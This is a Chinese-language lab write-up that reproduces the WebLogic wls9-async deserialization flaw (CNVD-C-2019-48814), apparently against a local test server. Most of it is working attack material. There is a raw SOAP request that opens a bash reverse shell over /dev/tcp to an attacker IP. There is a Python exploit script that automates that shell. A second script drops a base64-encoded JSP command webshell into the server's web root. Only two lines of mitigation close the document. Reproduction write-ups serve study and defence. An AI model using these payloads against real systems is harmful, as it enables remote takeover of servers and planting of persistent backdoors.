漏洞简介
WebLogic是美国Oracle公司出品的一个Application Server,确切的说是一个基于JAVAEE架构的中间件,是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
WebLogic将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。是商业市场上主要的Java(J2EE)应用服务器软件(Application Server)之一,是世界上第一个成功商业化的J2EE应用服务器,具有可扩展性,快速开发,灵活,可靠性等优势。
CNVD-C-2019-48814漏洞主要是利用了WebLogic中的wls9-async组件,攻击者可以在
/_async/AsyncResponseService路径下传入恶意的xml格式的数据,传入的数据在服务器端反序列化时,执行其中的恶意代码,实现远程命令执行,攻击者可以进而获得整台服务器的权限。
漏洞影响
WebLogic 10.*
WebLogic 12.1.3.0
漏洞复现
0x00
先关闭centos的防火墙
启动weblogic
1
| cd /usr/local/weblogic/wlserver_10.3/samples/domains/wl_server/bin
|
换回kali 查看是或否启动
发现利用成功
漏洞验证
访问http://10.1.1.100:7001/_async/
继续访问http://10.1.1.100:7001/_async/AsyncResponseService
说明存在了NVD-C-2019-48814 漏洞
0x01
先使用nc 监听一个端口,用于接受反弹的shell
然后开启火狐的代理
将端口设置成burpsuite的默认端口 8080
然后开启kali 自带的burpsuite
利用方法一 使用手动抓取数据包的形式
抓取ttp://10.1.1.100:7001/_async/AsyncResponseService 的数据包
查看ip 地址
使用payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
| POST /_async/AsyncResponseService HTTP/1.1
Host: 10.1.1.100:7001
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/10.1.1.200/666 0>&1</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
|
注意更改端口号和ip
发送成功
成功反弹shell
利用方法二 使用脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
|
import sys
import requests
url = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]
print '''
____
| _ \
| |_) |_ _ _ __ __ _ ___ ___
| _ <| | | | '_ \ / _` / __/ __|
| |_) | |_| | |_) | (_| \__ \__ \
|____/ \__, | .__/ \__,_|___/___/
__/ | |
|___/|_| By jas502n
No Pactch For CVE-2017-10271
_async/AsyncResponseService RCE
'''
print ">>>> usage: python test.py url reserve_ip reserve_port \n"
payload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">\r\n <void class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\">\r\n <void index=\"0\">\r\n <string>/bin/bash</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>-c</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>bash -i >& /dev/tcp/%s/%s 0>&1</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/></void>\r\n </java>\r\n</work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>" % (ip,port)
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language': "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
'Accept-Encoding': "gzip, deflate",
'X-Forwarded-For': "127.0.0.2",
'Connection': "close",
'Upgrade-Insecure-Requests': "1",
'Content-Type': "text/xml",
'Content-Length': "963",
'cache-control': "no-cache"
}
response = requests.request("POST", url, data=payload, headers=headers)
print "status_code:%s" % str(response.status_code)
print(response.text)
|
1
| python async_reserve_shell.py http://10.1.1.100:7001/_async/AsyncResponseService 10.1.1.200 9999
|
成功反弹
0x03
利用 CNVD-C-2019-48814 上传webshell
直接使用脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
|
import requests
import sys
url = sys.argv[1]
url_dir = "/_async/AsyncResponseService"
vuln_url = url + url_dir
print '''
_ _ _ _
| | | | | | |
__ _____| |__ ___| |__ ___| | |
\ \ /\ / / _ \ '_ \/ __| '_ \ / _ \ | |
\ V V / __/ |_) \__ \ | | | __/ | |
\_/\_/ \___|_.__/|___/_| |_|\___|_|_|
By jas502n
No Pactch For CVE-2017-10271
_async/AsyncResponseService RCE
'''
print "\n>>>>Usage: python webshell.py url webshell.jsp\n"
print ">>>The Vuln Url: %s" % vuln_url
print
webshell_name = sys.argv[2]
webshell_dir = "servers/examplesServer/tmp/_WL_internal/bea_wls9_async_response/tfmgqe/war/"
payload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">\r\n <void class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\">\r\n <void index=\"0\">\r\n <string>/bin/bash</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>-c</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>echo IDwlQCBwYWdlIGltcG9ydD0iamF2YS51dGlsLiosamF2YS5pby4qIiU+CjwlCiU+CjxIVE1MPjxCT0RZPgpDb21tYW5kcyB3aXRoIEpTUAo8Rk9STSBNRVRIT0Q9IkdFVCIgTkFNRT0ibXlmb3JtIiBBQ1RJT049IiI+CjxJTlBVVCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgo8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iU2VuZCI+CjwvRk9STT4KPHByZT4KPCUKaWYgKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSAhPSBudWxsKSB7CiAgICBvdXQucHJpbnRsbigiQ29tbWFuZDogIiArIHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSArICI8QlI+Iik7CiAgICBQcm9jZXNzIHA7CiAgICBpZiAoIFN5c3RlbS5nZXRQcm9wZXJ0eSgib3MubmFtZSIpLnRvTG93ZXJDYXNlKCkuaW5kZXhPZigid2luZG93cyIpICE9IC0xKXsKICAgICAgICBwID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiY21kLmV4ZSAvQyAiICsgcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKICAgIH0KICAgIGVsc2V7CiAgICAgICAgcCA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKICAgIH0KICAgIE91dHB1dFN0cmVhbSBvcyA9IHAuZ2V0T3V0cHV0U3RyZWFtKCk7CiAgICBJbnB1dFN0cmVhbSBpbiA9IHAuZ2V0SW5wdXRTdHJlYW0oKTsKICAgIERhdGFJbnB1dFN0cmVhbSBkaXMgPSBuZXcgRGF0YUlucHV0U3RyZWFtKGluKTsKICAgIFN0cmluZyBkaXNyID0gZGlzLnJlYWRMaW5lKCk7CiAgICB3aGlsZSAoIGRpc3IgIT0gbnVsbCApIHsKICAgIG91dC5wcmludGxuKGRpc3IpOwogICAgZGlzciA9IGRpcy5yZWFkTGluZSgpOwogICAgfQp9CiU+CjwvcHJlPgo8L0JPRFk+PC9IVE1MPiAKCg== |base64 -d > %s%s</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/></void>\r\n </java>\r\n</work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>" % (webshell_dir,webshell_name)
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language': "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
'Accept-Encoding': "gzip, deflate",
'Connection': "close",
'Content-Type': "text/xml",
'Content-Length': "2163",
'cache-control': "no-cache"
}
response = requests.request("POST", vuln_url, data=payload, headers=headers)
print "\n\nWebshell: \n"
print url + "/_async/" + webshell_name + "?cmd=whoami"
print(response.text)
|
访问这个
复现完毕
漏洞修复
目前,Oracle官方暂未发布补丁,临时解决方案如下:
1、找到并删除wls9_async_response.war、wls-wsat.war 并重启Weblogic服务
2、通过访问策略控制禁止/_async/* 及 /wls-wsat/* (注意) 路径的URL访问。